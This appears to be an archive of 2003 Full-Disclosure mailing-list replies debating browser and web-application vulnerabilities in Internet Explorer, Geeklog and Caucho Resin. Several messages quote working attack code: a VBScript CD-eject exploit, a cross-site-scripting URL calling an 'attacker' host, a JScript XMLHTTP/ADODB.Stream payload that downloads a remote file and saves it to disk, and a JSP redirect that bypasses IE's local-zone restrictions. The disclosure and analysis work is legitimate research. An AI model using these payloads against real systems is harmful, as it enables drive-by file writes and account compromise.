> of Winrar (up to 3.20 - the latest version to date) seem to be vulnerable.
>
> The proof of concept .rar file can be obtained from the following URL:
> http://www.geocities.com/visitbipin/test123.zip
> If you extract the file, Winrar will try to extract this 100-byte .rar
> file trusting the information in its header, but not on the basis of its
> data integrity.
>
> --[Background Information]--
> This bug was originally discovered by hUNT3R, a member of 01 Security
> Submission. The vendor was notified via email. Further discussion took place
> in 01 Security Submission's forum with the developer of Winrar (Eugene
> Roshal):
> URL: http://www.ysgnet.com/phorum/read.php?f=1&i=341&t=324#reply_341
>
> ---[about 01 security submission]---
> 01s.s is a small group having experience as security specialists,
> programmers and system administrators
> http://www.ysgnet.com/hn.
>
>
>
>| .oÛ_Oo.h»UNTER.oO_Ûo. |
>   §  !¹007Õ°¿ÑïÞÎß°Õæ9*½¹!  ‡
>
> _
> Secure mail ---> http://www.blackcode.com
>


Re: [Full-Disclosure] Re: I have fixes for the Geeklog vulnerabilities

2003-10-07 Thread jelmer
Dirk,

Ok let me get this straight, basically what you're saying is:
he's correct on one point, the xss issue, and the others might possibly
affect mysql 4.1 (it does),
and then you go about and tell him how he wasted everybody's time.
So if it affects only 1% of your userbase it's not an issue and you shouldn't
be reporting it?
Even on mysql 3 it's probably possible to construct some url that will suck up
a lot of resources.

On your site you claim "Three members of the Geeklog development team have
now been trying to reproduce these issues and failed"; wouldn't your time
have been better spent *fixing* these issues?
It's hardly rocket science. Why wait until someone comes up with a clever
way to exploit it? It's obviously a risk, why wait until it becomes a threat?

IMHO you've got the wrong attitude. Anyway I am not done yet.
I don't normally "do" sql injection but being annoyed with your response as
I was I took a quick
look at this geeklog, and I was stunned at how insecure it was:

- It by default stores the password hash in a cookie, you can't turn that off
- You don't have to enter your old password in order to change it

This means that any xss issue in this site will lead to compromises of
accounts: you can steal the
hash and userID, place it in your cookie, log in and voila. If you do this
you have to be *EXTREMELY*
wary of xss issues; well, you're not, you can find these all over the place.

All the classics just work, like



test

in the forum, I won't even bother listing all the issues.

Parameters passed in urls that get inserted into queries get sanitized
hardly anywhere.
I attached a python script that should crack any user's account who ever
posted to the forums in under half an hour,
just get the hash, stuff it and the accompanying user id in a cookie, get to
the site and change the password.
The exploit is rather messy and I haven't tested it too thoroughly but it
should work (I think :) ). Note this is a separate issue from the ones
reported by Lorenzo. But again, these issues are all over the place.


--jelmer




- Original Message - 
From: "Dirk Haun" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Sunday, October 05, 2003 11:03 PM
Subject: [Full-Disclosure] Re: I have fixes for the Geeklog vulnerabilities


> Lorenzo Hernandez Garcia-Hierro wrote:
>
> >Due to the completely incorrect treatment and work of the Geeklog
> >development team , that they don't developed fixes for THEIR product
>
> As a member of the Geeklog Development Team, I'd like to point out that
> the poster of the above lines did not bother to contact us, both with his
> original findings, nor with these patches. Talk about incorrect treatment.
>
> Furthermore, of the original findings (posted here and on BugTraq a week
> ago), only the Shoutbox issue has been confirmed (and a patch is
> available on the Geeklog website).
>
> None of the supposed SQL injection issues that Lorenzo Hernandez Garcia-
> Hierro claims to have found could be confirmed by us or members of the
> Geeklog community. We can only assume that he only noticed that when
> attempting to inject SQL into URLs, Geeklog would produce SQL errors and
> from that he seems to have deduced that Geeklog was vulnerable for SQL
> injections. When asked to explain his findings, he couldn't (or wouldn't)
> come up with a working example either.
>
> Now, there's no doubt that Geeklog could do a better job in filtering
> these attempts. Work on that is currently under way - which we would have
> told Lorenzo Hernandez Garcia-Hierro if he had bothered to contact us.
>
> Potential problems that we have found so far:
>
> - the SQL error message displayed by Geeklog could, in theory, leak
> sensitive information
> - sites where the PHP magic_quotes setting is OFF are slightly more prone
> to the (alleged) injections than when it's ON
> - sites running on MySQL 4.1 (which is currently in alpha state and not
> ready for production use) are at a higher risk since MySQL 4.1 allows
> concatenation of SQL requests (which previous versions didn't)
>
> We have informed our users about these issues on the Geeklog homepage and
> will continue to do so. We value security very highly, but we prefer to
> handle it in a non-sensationalist way. We would have preferred to come up
> with a solution to the problems and then post a detailed analysis of the
> problems here (and on BugTraq). With his failure to contact the
> developers, Lorenzo Hernandez Garcia-Hierro has yet again caused more
> confusion than actually helping the situation.
>
> Overall, this is a textbook example of how NOT to handle security issues.
> By not contacting the developers, posting a report full of inaccuracies,
> and, in the end, mostly non-working examples, Lorenzo Her

Re: [Full-Disclosure] Internet Explorer (BAN IT !!!)

2003-10-09 Thread jelmer



Like people have noted, this is old news.
 
But to comment on what you said, it protects you 
against the exploit, not the vulnerability; you might just as well drop an exe in 
the user's start folder. Yes, it wouldn't be instant but precious few 
people would notice it.
 
--jelmer

  - Original Message - 
  From: 
  Peter King 
  
  To: [EMAIL PROTECTED] 
  Sent: Thursday, October 09, 2003 12:31 
  PM
  Subject: Re: [Full-Disclosure] Internet 
  Explorer (BAN IT !!!)
  
  i confirm that an unprivileged user is safe from this exploit. and i 
  agree with you : too many people are running their Windows with Full 
  Privileges :/
   
  Regards.
  Peter - System Administrator

  Irwan Hadi <[EMAIL PROTECTED]> wrote:
  On Thu, Oct 09, 2003 at 07:54:08AM +1000, gregh wrote:
  > 
  > - Original Message - 
  > From: "Stephen" <[EMAIL PROTECTED]>
  > To: <[EMAIL PROTECTED]>
  > Sent: Thursday, October 09, 2003 5:19 AM
  > Subject: [Full-Disclosure] Internet Explorer (BAN IT !!!)
  > 
  > 
  > >
  > > It becomes really dangerous to use IE ...
  > >
  > > http://www.k-otik.com/WMPLAYER-TEST/
  > >
  > > God bless Mozilla
  > >
  > > http://www.mozilla.org/
  > >
  > 
  > 
  > Your test didn't work on my IESP1 under XP with all patches excepting
  > 811394. Absolutely no effect on WMP. My original WMP remains and works.

  It depends whether you were logging as a privileged user or not.
  If not, then your browser can't delete the wmplayer.exe file, because
  the only user that can change/delete the wmplayer.exe file is privileged
  user.
  C:\PROGRA~1\Windows Media Player>cacls wmplayer.exe
  C:\PROGRA~1\Windows Media Player\wmplayer.exe BUILTIN\Users:R
                                                BUILTIN\Power Users:C
                                                BUILTIN\Administrators:F
                                                NT AUTHORITY\SYSTEM:F

  C:\PROGRA~1\Windows Media Player>

  The problem is just too many people are running their Windows with
  Full Privileges.


  Do you Yahoo!?
  The New Yahoo! Shopping - with improved product search


Re: [Full-Disclosure] Internet Explorer (BAN IT !!!)

2003-10-10 Thread jelmer
Just looked at it, the authors messed up, so no it shouldn't work; it
doesn't work here.

They didn't get that error.jsp is a java server page (something roughly
equivalent to asp and php) that sets the response code to something that
triggers the res file to be loaded.

--jelmer



- Original Message - 
From: "Syed Imran Ali" <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, October 10, 2003 12:02 PM
Subject: RE: [Full-Disclosure] Internet Explorer (BAN IT !!!)


> Yup that's true, the exploit actually didn't work even if I was logged
> in as Administrator or a normal user in Windows XP SP1 with all patches
> installed except 811394.
>
> Regards,
> Syed Imran Ali
>
> Senior Network Engineer
>
> (T) +92-300-9256202
>
> :~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:~:
> The information contained in this e-mail is confidential and may be
> privileged. It is intended for the addressee only. If you have received
> this e-mail in error please notify us immediately, then delete this
> e-mail. You should not copy it for any purpose, or disclose its contents
> to any other person. We cannot accept any responsibility for viruses, so
> please scan all attachments. The statements and opinions expressed in
> this message are those of the author and do not necessarily reflect
> those of the company. The company does not take any responsibility for
> the views of the author
>
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of gregh
> Sent: Friday, October 10, 2003 3:07 AM
> To: Irwan Hadi
> Cc: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!)
>
> - Original Message - 
> From: "Irwan Hadi" <[EMAIL PROTECTED]>
> To: "gregh" <[EMAIL PROTECTED]>
> Cc: "Stephen" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
> Sent: Thursday, October 09, 2003 3:55 PM
> Subject: Re: [Full-Disclosure] Internet Explorer (BAN IT !!!)
>
>
> > On Thu, Oct 09, 2003 at 07:54:08AM +1000, gregh wrote:
> >
> > >
> > > - Original Message - 
> > > From: "Stephen" <[EMAIL PROTECTED]>
> > > To: <[EMAIL PROTECTED]>
> > > Sent: Thursday, October 09, 2003 5:19 AM
> > > Subject: [Full-Disclosure] Internet Explorer (BAN IT !!!)
> > >
> > >
> > > >
> > > > It becomes really dangerous to use IE ...
> > > >
> > > > http://www.k-otik.com/WMPLAYER-TEST/
> > > >
> > > > God bless Mozilla
> > > >
> > > > http://www.mozilla.org/
> > > >
> > >
> > >
> > > Your test didn't work on my IESP1 under XP with all patches
> excepting
> > > 811394. Absolutely no effect on WMP. My original WMP remains and
> works.
> >
> > It depends whether you were logging as a privileged user or not.
> > If not, then your browser can't delete the wmplayer.exe file, because
> > the only user that can change/delete the wmplayer.exe file is
> privileged
> > user.
> > C:\PROGRA~1\Windows Media Player>cacls wmplayer.exe
> > C:\PROGRA~1\Windows Media Player\wmplayer.exe BUILTIN\Users:R
> >   BUILTIN\Power Users:C
> >   BUILTIN\Administrators:F
> >   NT AUTHORITY\SYSTEM:F
> >
> >
> > C:\PROGRA~1\Windows Media Player>
> >
> > The problem is just too many people are running their Windows with
> > Full Privileges.
> >
>
>
> Didn't matter what I logged in as. I normally am ADMIN, naturally, but a
> privileged user, a very limited user - no difference. The exploit didn't
> work.
>
> Greg.
>
>


Re: [Full-Disclosure] [A bug! update...] Whom to blame, the HTML interpreter or the JavaScript compiler?

2003-10-10 Thread jelmer
This is the code you sent



THIS IS hUNT3R aka:Bipin Gautam, exploit revised by
Cyberdude

document.write("<b>hUNTER &
Cyberdude</b>alert("it works 1");
alert("This works 2");





This gives an "Unterminated string constant" error followed by 2 alerts, which
is exactly what it should do.

1. document.write("<b>hUNTER & Cyberdude</b>

This gives the unterminated string constant: you're simply not closing your
string, so hUNTER & Cyberdude never gets written out.

2. alert("it works 1"); alert("This works 2"); 

This is perfectly valid and thus executes.


I really don't see what you're trying to do or what the threat would be once
you got whatever you're trying to do to work.

--jelmer





- Original Message - 
From: "bipin gautam" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, October 10, 2003 7:16 PM
Subject: [Full-Disclosure] [A bug! update...] Whom to blame, the HTML
interpreter or the JavaScript compiler?


> --- [Affected] ---
> All versions of "OPERA, MOZILLA and INTERNET EXPLORER"
> available up to this release DATE!
> --- [Proof of concept] ---
> We have made a small script. Check it out,
> http://www.cyberdude.com.np/javascript.htm
> --- [Bug Details] ---
> 
> 
> 
> THIS IS hUNT3R aka: Bipin Gautam
>
alert("<script>location.href="http://www.ysgnet.com";")
> 
> 
> 
>
>
> 
> 
> THIS IS hUNT3R aka:Bipin Gautam, exploit revised by
> Cyberdude
> 
> document.write("<b>hUNTER &
> Cyberdude</b>alert("it works 1");
> alert("This works 2");
> 
> 
> 
>
> *
> --[Description]---
> The browser is letting you compile something inside
> the alert function. Well, it should show it anyway
> without compiling the script tag as it is inside the
> quotation. But surprisingly, the output is different! We
> found the JavaScript compiler choked when we use the
>  tag inside a function like alert(); this also
> proves to be true for the document.write(); function. This
> means that this script is going to choke bad and you
> won't get any output but just the ); that's all.
>
> This script is working. It's not that it is not
> working. It works in the starting script tag but when
> the html parses the script tag inside the
> document.write it goes mad coz nested scripting is not
> possible in HTML, the only nested tag in HTML must be
> the table tag, so in this script the HTML interpreter
> goes mad. But we can still insert the java script in
> it.
>
> What we did was, we inserted the closing tag of
> JavaScript  first closing the script tag that
> was opened already. After that we added the new
> starting 
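
jelmer's point above (the HTML parser ends a script element at the first closing script tag it sees, even inside a JavaScript string, so the first body is an unterminated string and the second body runs normally) is worth seeing mechanically, because the same behaviour is what makes "</script>" in server-supplied data a page-injection problem. What follows is an added example and not code from either poster: it splits a page into script bodies the way an HTML parser does, checks each body with new Function (which parses without running anything), and shows the defensive side, escaping "<" as "\u003c" when server data is embedded in an inline script. POSTED_SNIPPET reconstructs the thread's test page with the tags the archive stripped; that reconstruction, the constructed UNTRUSTED value and all function names are assumptions.

```javascript
// Added example (not from the original thread): how an HTML parser splits
// inline <script> elements, and why a "</script>" inside a JS string ends the
// element early. POSTED_SNIPPET is a reconstruction of the thread's test page
// (the archive dropped the tags), so it is an assumption, not the original.

// Return the bodies of every inline <script> element in `html`, the way an
// HTML parser does: after "<script ...>", the body runs up to the next
// "</script" (case-insensitive), whatever the JavaScript inside looks like.
function splitScriptBodies(html) {
  const bodies = [];
  const open = /<script\b[^>]*>/gi;
  let m;
  while ((m = open.exec(html)) !== null) {
    const start = m.index + m[0].length;
    const rest = html.slice(start);
    const closeAt = rest.search(/<\/script/i);
    if (closeAt === -1) { bodies.push(rest); break; }   // unterminated element
    bodies.push(rest.slice(0, closeAt));
    open.lastIndex = start + closeAt;                    // resume after this body
  }
  return bodies;
}

// Is a script body syntactically valid JavaScript? `new Function` parses the
// body without executing it, so a truncated body surfaces as a SyntaxError
// (IE's "Unterminated string constant").
function parsesAsJavaScript(body) {
  try { new Function(body); return true; }
  catch (e) { if (e instanceof SyntaxError) return false; throw e; }
}

// Defensive side: when JSON is embedded in an inline script, escape "<" as
// "\u003c". JavaScript reads the same string back, but the HTML parser no
// longer sees a "</script" (or "<!--") inside the element.
function escapeForInlineScript(jsonText) {
  return jsonText.replace(/</g, '\\u003c');
}

// The thread's test page, reconstructed with its tags (assumption).
const POSTED_SNIPPET =
  '<script>document.write("<b>hUNTER & Cyberdude</b></script>' +
  '<script>alert("it works 1");\nalert("This works 2");</script>';

// Per script element: its body and whether a JS engine would accept it.
function analyseScripts(html) {
  return splitScriptBodies(html).map(body => ({ body, valid: parsesAsJavaScript(body) }));
}

// Constructed untrusted value, as a server might embed a user profile.
const UNTRUSTED = { name: '</script><script>alert(document.cookie)</script>' };

// Build a page that embeds UNTRUSTED as JSON, with or without escaping.
function buildPage(escape) {
  const json = JSON.stringify(UNTRUSTED);
  const payload = escape ? escapeForInlineScript(json) : json;
  return '<html><script>var profile = ' + payload + ';</script></html>';
}
```

Run analyseScripts(POSTED_SNIPPET) and you get two elements, the first invalid and the second valid, which is the behaviour jelmer describes; buildPage(false) splits into two elements with the injected one intact, while buildPage(true) stays one valid element.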

Re: [Full-Disclosure] Ejecting CDs with VBScript ( Online Exploit )

2003-10-10 Thread jelmer
they fixed it with MS03-021 alongside some other issues

http://archives.neohapsis.com/archives/fulldisclosure/2003-q2/1765.html


- Original Message - 
From: "Lorenzo Hernandez Garcia-Hierro" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, October 10, 2003 11:12 PM
Subject: [Full-Disclosure] Ejecting CDs with VBScript ( Online Exploit )


> Hi friends,
> I'm not very happy with this, I have done an online test to eject cds in
> MS Internet Explorer
> and I have tested it on all the computers in my house but I was surprised
> when I checked that the
> last version of MSIE allows the execution of the script in the following
> sec. zones:
> . LOCAL/INTRANET
> . REMOTE/INTERNET
> I tested it with default values and the exploit is executed; I edited the
> values and again it was
> executed.
> Am I discovering a new vulnerability in MS Internet Explorer?
> I'm not sure because there are lots of known holes in MSIE.
> Suggestions and help are completely welcome.
> The best regards,
> PS: This is the code of the exploit:
> -
> 
> rem --
> rem No Secure Root Group Security Research
> rem Coder: Trulux / Lorenzo Hdez G-H
> rem --
> rem http://www.nsrg-security.com
> rem --
> rem -> CREATE WINDOWS MEDIA PLAYER OBJECT
> rem -
> Set LARRYINTHEWILD = CreateObject("WMPlayer.OCX.7")
> rem -
> rem -> SETTING SOME VARIABLES FOR EJECT CD UNITS
> rem -
> Set RIAAsaysBLAH = LARRYINTHEWILD.cdromCollection
> rem -
> rem -> EJECTING ROUTINE
> rem -
> If RIAAsaysBLAH.Count >= 1 Then
>     For i = 0 To RIAAsaysBLAH.Count - 1
>         RIAAsaysBLAH.Item(i).Eject
>     Next ' cdrom
> End If
> rem -> END
> 
> --
>
> NOTE: I don't know if this is a known security hole, if this was
> discovered before, I'm sorry ( and a little sad :-( ).
> You can test it online:
> http://test-zone.nsrg-security.com/browser/msie/cdrom
>
>


Re: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting

2003-10-19 Thread jelmer
Donny,

These are in the example applications, which any sane admin should disable
right away, much like caucho-status.
These are basic procedures in setting up a server.


--jelmer





- Original Message - 
From: "morning_wood" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Sunday, October 19, 2003 12:37 PM
Subject: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting


> -
>   - EXPL-A-2003-026 exploitlabs.com Advisory 026 -
> -
>   -= Caucho Resin =-
>
>
> Donnie Werner
> Oct 18, 2003
>
>
>
> Vulnerability(s):
> 
> 1. XSS
>
>
> note: this is not
>
> http://www.securiteam.com/securitynews/5KP0O1F7FM.html
> http://www.securitytracker.com/alerts/2002/Jun/1004552.html
>
>
> Product:
> 
> Caucho Resin Httpd 2.x
>
> Reviews:
> 
> http://www.caucho.com/sales/customers.xtp
>
>
> Description of product:
> ---
> "Resin® is a cutting-edge XML Application Server.
> It serves the fastest servlets and JSP."
>
>
> VULNERABILITY / EXPLOIT
> ==
> default port 8080 ( others used )
>
> affected scripts:
> env.jsp
> form.jsp
> session.jsp
> tictactoe.jsp
>
>
http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=http://attcker/evil.cgi";>4
> or
>
alert(document.domain);

Re: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting

2003-10-20 Thread jelmer

- Original Message - 
From: "Gregory Steuck" <[EMAIL PROTECTED]>
To: "jelmer" <[EMAIL PROTECTED]>
Cc: "morning_wood" <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Sent: Monday, October 20, 2003 7:27 AM
Subject: Re: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting


> >>>>> "jelmer" == jelmer  <[EMAIL PROTECTED]> writes:
>
> jelmer> Donny, These are in the example applications, which any sane
> jelmer> admin should disable right away, much like caucho-status
> jelmer> These are basic procedures in setting up a server.
>
> Yes, but is it not extremely lame of the vendor to ship samples with
> XSS vulnerabilities?

The point of examples is usually to be as clear as possible so it's easy to
understand; adding filtering would just make the examples harder to read.
It's not production code after all. I think it's perfectly ok if caucho
refuses to "fix" this.



Re: [Full-Disclosure] RE: Internet Explorer and Opera local zone restriction bypass

2003-10-25 Thread jelmer
osed by IE6 SP1 is imposed on all local protocols, such
as file:// and res://, and this new way to circumvent it equally applies to
all local protocols. This means that you don't have to know the location of
a specific file, but instead can open a resource file available on all
systems, such as
>
> Content-Location: res:///browselc.dll/mb404.htm
>
> Of course, since you could not inject any code in the resource file you
will now have to use another cross-domain scripting vulnerability in place
of the Macromedia Flash vulnerability you identified in the first issue. On
the positive side, it also means that you no longer have to guess the user's
Windows Logon name.
>
>
> In summary, when Macromedia changes their Flash player to no longer store
Flash cookies in plaintext in a known location, this will no longer be an
issue. All of the currently unpatched cross-domain scripting vulnerabilities
are having patches produced, and since they have no easy POC exploits I
doubt we will see any malicious use of the local file redirection variation
you found.
>
>
>
> Regards
> Thor Larholm
> PivX Solutions, LLC - Senior Security Researcher
> http://pivx.com/larholm/ - Get our research, join our mailinglist
>





Here's what I sent to bugtraq:

--------
--

What this does is have a swf file generate a "flash cookie" or .sol file
which gets stored to a pseudo-known location
(you need to know the logged in username):

C:\Documents and Settings\Jelmer\Application Data\Macromedia\Flash
Player\mlsecurity.com\mlsecurity.sol

in this cookie we find

var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET",
"http://mlsecurity.com/random/ie.txt",0); x.Send();var s = new
ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\mlsecurity.txt",2);

which is the unpatched ADODB.Stream issue. So what he's trying to do is get
this to run from this sol file
by getting internet explorer to render it as an html file in an iframe.

He tries to accomplish this by setting the response code to 302 (MOVED
TEMPORARILY) and making the location header in the reply point to the
locally stored cookie,
like this:

HTTP/1.1 302 Found
Date: Fri, 24 Oct 2003 23:32:13 GMT
Server: Apache/2.0.46 (Unix)
Accept-Ranges: bytes
Location: file:///C:/Documents and Settings/jelmer/Application
Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1

the following jsp duplicates the behaviour

--snip--

<%
response.setStatus(HttpServletResponse.SC_MOVED_TEMPORARILY);
response.setHeader("Location","file:///C:/Documents and
Settings/jelmer/Application Data/Macromedia/Flash
Player/mlsecurity.com/mlsecurity.sol");
%>

--snip--

Then he uses a dynamic iframe to load this page rather than a static one, e.g.
he uses

document.write('');

rather than



Using the static version has no effect.


Now that's how it works; now about *if* it works. Well, when I initially
tried it, it did absolutely nothing for me
(fully patched IE6). Yes, it showed the location in the IFRAME as being local
in the frame properties, but it didn't
render the contents.

Then I cleared the cache, closed IE and all of a sudden it was kind of
working, in that it renders the local
file on pressing the refresh button.

When testing from the local filesystem, calling
window.frames[0].location.reload() also did
the trick, thus "automating" the attack.
You can't use this from the internet though because of cross domain policies,
although you could
most likely bypass this by using one of liu die yu's unpatched
vulnerabilities.
All in all it's still a bit rough and probably needs some work, at least from
where I am sitting.





For those curious as to what is in the swf, here's the actionscript code:


function saveobject(cookiename)
{
    var Daten_array = new Array("Sven", "kelor", "Tschdaeff", "Madokan",
                                "Ming", "Coolflash");
    var Datum = new Date();
    var Satz_str = _root.teststr_txt.text;
    _root.createEmptyMovieClip("Test_mc", 0);
    meinCook_so = SharedObject.getLocal(cookiename, "/");
    meinCook_so.data.my_String = Satz_str;
    meinCook_so.data.my_Array = Daten_array;
    meinCook_so.data.my_Date = Datum;
    meinCook_so.data.my_MovieClip = Test_mc;
    RESULTS = meinCook_so.flush();
    if (RESULTS == true)
    {
        _root.message_txt.text = "Eingabe Erfolgreich!";
    }
}

function readobject(cookiename)
{
leseCook_so = SharedObject.getLocal(cookiename, "/");
delete("meinCook_so");
_root.read_txt.htmlText = "my
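
The mechanism jelmer walks through (a 302 whose Location header points at a file:// path, plus the Content-Location: res:// variant Thor mentions in the quoted part) is straightforward to flag in captured traffic, because a redirect into a local-zone scheme has no legitimate use on the open internet. What follows is an added example, not part of the original message nor of any tool named in the thread: it parses a raw HTTP response head and reports redirect or Content-Location targets whose scheme is local, treating a bare drive letter the same way. The response heads are constructed after the one quoted above; the scheme list and the function names are assumptions.

```javascript
// Added example (not from the thread): flag HTTP responses that send the
// browser into the local zone via Location or Content-Location. The scheme
// list and the sample heads below are assumptions constructed for the example.

// Schemes IE resolves locally; a one-letter "scheme" is a Windows drive letter.
const LOCAL_SCHEMES = new Set(['file', 'res', 'mk', 'its', 'ms-its', 'shell']);

// Parse a raw HTTP/1.x response head into a status code and a header map
// keyed by lowercase name; repeated headers are kept as a list.
function parseResponseHead(raw) {
  const lines = raw.split(/\r?\n/);
  const m = /^HTTP\/\d\.\d\s+(\d{3})/.exec(lines[0] || '');
  if (!m) throw new Error('not an HTTP response head');
  const headers = {};
  for (const line of lines.slice(1)) {
    if (line === '') break;                 // blank line ends the head
    const idx = line.indexOf(':');
    if (idx === -1) continue;               // tolerate junk lines
    const name = line.slice(0, idx).trim().toLowerCase();
    const value = line.slice(idx + 1).trim();
    (headers[name] = headers[name] || []).push(value);
  }
  return { status: Number(m[1]), headers };
}

// Scheme of a URL reference (lowercase), or null for a relative reference.
function schemeOf(ref) {
  const m = /^\s*([a-z][a-z0-9+.-]*):/i.exec(ref);
  return m ? m[1].toLowerCase() : null;
}

function isLocalScheme(scheme) {
  return scheme !== null && (LOCAL_SCHEMES.has(scheme) || scheme.length === 1);
}

// Findings for one response head. Location only matters on a 3xx (browsers
// do not follow it otherwise); Content-Location is checked on any status.
function findLocalZoneRedirects(raw) {
  const { status, headers } = parseResponseHead(raw);
  const findings = [];
  const check = (name, onlyOn3xx) => {
    if (onlyOn3xx && (status < 300 || status > 399)) return;
    for (const target of headers[name] || []) {
      const scheme = schemeOf(target);
      if (isLocalScheme(scheme)) findings.push({ header: name, scheme, target, status });
    }
  };
  check('location', true);
  check('content-location', false);
  return findings;
}

// Constructed sample heads (after the response quoted in the message).
const CAPTURED_REDIRECT = [
  'HTTP/1.1 302 Found',
  'Date: Fri, 24 Oct 2003 23:32:13 GMT',
  'Server: Apache/2.0.46 (Unix)',
  'Location: file:///C:/Documents and Settings/jelmer/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol',
  'Content-Length: 0',
  '', '',
].join('\r\n');
const RES_CONTENT_LOCATION = [
  'HTTP/1.1 200 OK',
  'Content-Location: res:///browselc.dll/mb404.htm',
  'Content-Type: text/html',
  '', '',
].join('\r\n');
const DRIVE_LETTER_REDIRECT = ['HTTP/1.1 302 Found', 'Location: C:\\temp\\page.htm', '', ''].join('\r\n');
const BENIGN_REDIRECT = ['HTTP/1.1 301 Moved Permanently', 'Location: https://example.com/login', '', ''].join('\r\n');
const RELATIVE_REDIRECT = ['HTTP/1.1 302 Found', 'Location: /index.html', '', ''].join('\r\n');
const LOCATION_ON_200 = ['HTTP/1.1 200 OK', 'Location: file:///C:/unused.htm', '', ''].join('\r\n');
```

A proxy or IDS rule built on this check covers both the 302 trick here and the res:// Content-Location variant, while leaving ordinary absolute and relative redirects alone.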

Re: [Full-Disclosure] PIVX - GLAMOR PUSSES DE LUXE

2003-10-25 Thread jelmer
> Uno\ there is no security confirmation on the new mailing list created
> by pivx. We have subscribed everyone on this list to their new security
> update and self-promotion mailing list. And you don't even know it.
>
> Dos\ there is no way to unsubscribe from the new mailing list created
> by pivx. How the blazes can one not receive this self-promotional drivel
> at this time
>
> Tres\ html or plaintext selection for the the new mailing list created
> by pivx has no effect. The self-promotional material arrives as insidious
> html

An electronic message is "spam" IF: (1) the recipient's personal identity
and context are irrelevant because the message is equally applicable to many
other potential recipients; AND (2) the recipient has not verifiably granted
deliberate, explicit, and still-revocable permission for it to be sent; AND
(3) the transmission and reception of the message appears to the recipient
to give a disproportionate benefit to the sender.

seems to match all 3 criteria, report them



Re: [Full-Disclosure] when will IE exploits COME TO AN END...

2003-10-28 Thread jelmer
And what would the security implications of this be in your *cough* expert
opinion?

http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q208/4/27.asp&NoWebContent=1

- Original Message - 
From: "Bipin Gautam" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, October 28, 2003 3:17 PM
Subject: [Full-Disclosure] when will IE exploits COME TO AN END...


> another harmless! IE BUG... I GUESS
>
> Internet explorer can't click and properly open long URLs! in the
> browser...
>
> http://www.geocities.com/visitbipin/index9.htm
>
> see... IT'S A URL but ... you can't click at the link!!!
>
> I HAVE TRIED IT IN OTHER BROWSERS INCLUDING OPERA AND THE LINK OPENS
> WITHOUT ANY PROBLEM!
>
> WHEN WILL IE BUG END UP... anyway!!!
>
> _
> Secure mail ---> http://www.blackcode.com
>


Re: [Full-Disclosure] Re: Internet Explorer and Opera local zone restriction bypass

2003-10-29 Thread jelmer
I tried that and as I expected that doesn't work, it just prompts for
download if you redirect to that file.

I think you're confused with the object-tag-in-localzone type of
vulnerabilities we had a while back; you could execute programs without
parameters with that. But that's nothing like this, or should I perhaps write
*NOTHING LIKE THIS!!!*? as you seem to prefer caps. This vulnerability only
removes the restrictions that service pack 1 brought, in disallowing access
to local urls.

--jelmer



- Original Message - 
From: "Bipin Gautam" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, October 29, 2003 3:29 PM
Subject: [Full-Disclosure] Re: Internet Explorer and Opera local zone
restriction bypass


> try this ...
>
> it's damn strange to see WINXP LOGOFF WITHOUT ASKING MY PERMISSION
>
> file://c:\windows\system32\logoff.exe
>
>
>
> _
> Secure mail ---> http://www.blackcode.com
>


Re: [Full-Disclosure] Microsoft plans tighter security measures in Windows XP SP2

2003-11-01 Thread jelmer
pivx probably already was

http://slashdot.org/article.pl?sid=03/10/12/2221205&mode=thread&tid=109&tid=126&tid=128&tid=172&tid=187

Maybe they weren't handed a sack of money, but as the article states

"This was done in both a spirit of cooperation"

so this suggests microsoft involvement, and microsoft "owing you one" is not
a bad thing for any company.

Also, mentioning pivx in one breath with georgi guninski and @stake is
pushing it a bit.
Pivx plays the media really really well by giving their spokespersons
important sounding names such as "Senior Security Researcher"
(just as a sidenote I really suggest adding "engineer" in there somewhere,
makes it sound even more credible.)
Now Thor is a nice guy and a true javascript wiz but you can hardly compare
pivx with someone like georgi guninski who pioneered browser security, or
the skilled employees of @stake who do "real" security work.

--
  pivx - protecting your enterprise from malicious halflife exploits and XSS
issues in error pages ;)



- Original Message - 
From: "Georgi Guninski" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Sent: Saturday, November 01, 2003 5:08 PM
Subject: Re: [Full-Disclosure] Microsoft plans tighter security measures in
Windows XP SP2


> On Fri, 31 Oct 2003 18:27:30 -0500
> [EMAIL PROTECTED] wrote:
>
>
> > If I were a conspiracy theorist, I'd compare the probable cost of buying
off
> > Guninsky, the @stake crew, and the pivx crew, and compare that to the
cost of
> > actually fixing IE.   Then remember that although the open-source world
is
> > about pride and craftsmanship, Microsoft is all about the benjamins
> >
>
> The probable cost of buying Guninsky does not exist.
> m$ are lusers, and I am not a wh0re.
>
> I agree with your other rants, though.
>
> georgi
>
>


Re: [Full-Disclosure] irc.trojan.fgt - new variant.

2003-11-05 Thread Jelmer



I guess it's a matter of time before someone hacks in a http server and
makes it send out links like
http://victim ip/britney.jpg
Luckily microsoft patches stuff within 2 days, balmer said so so it must
be true ;)
 
 

  - Original Message - 
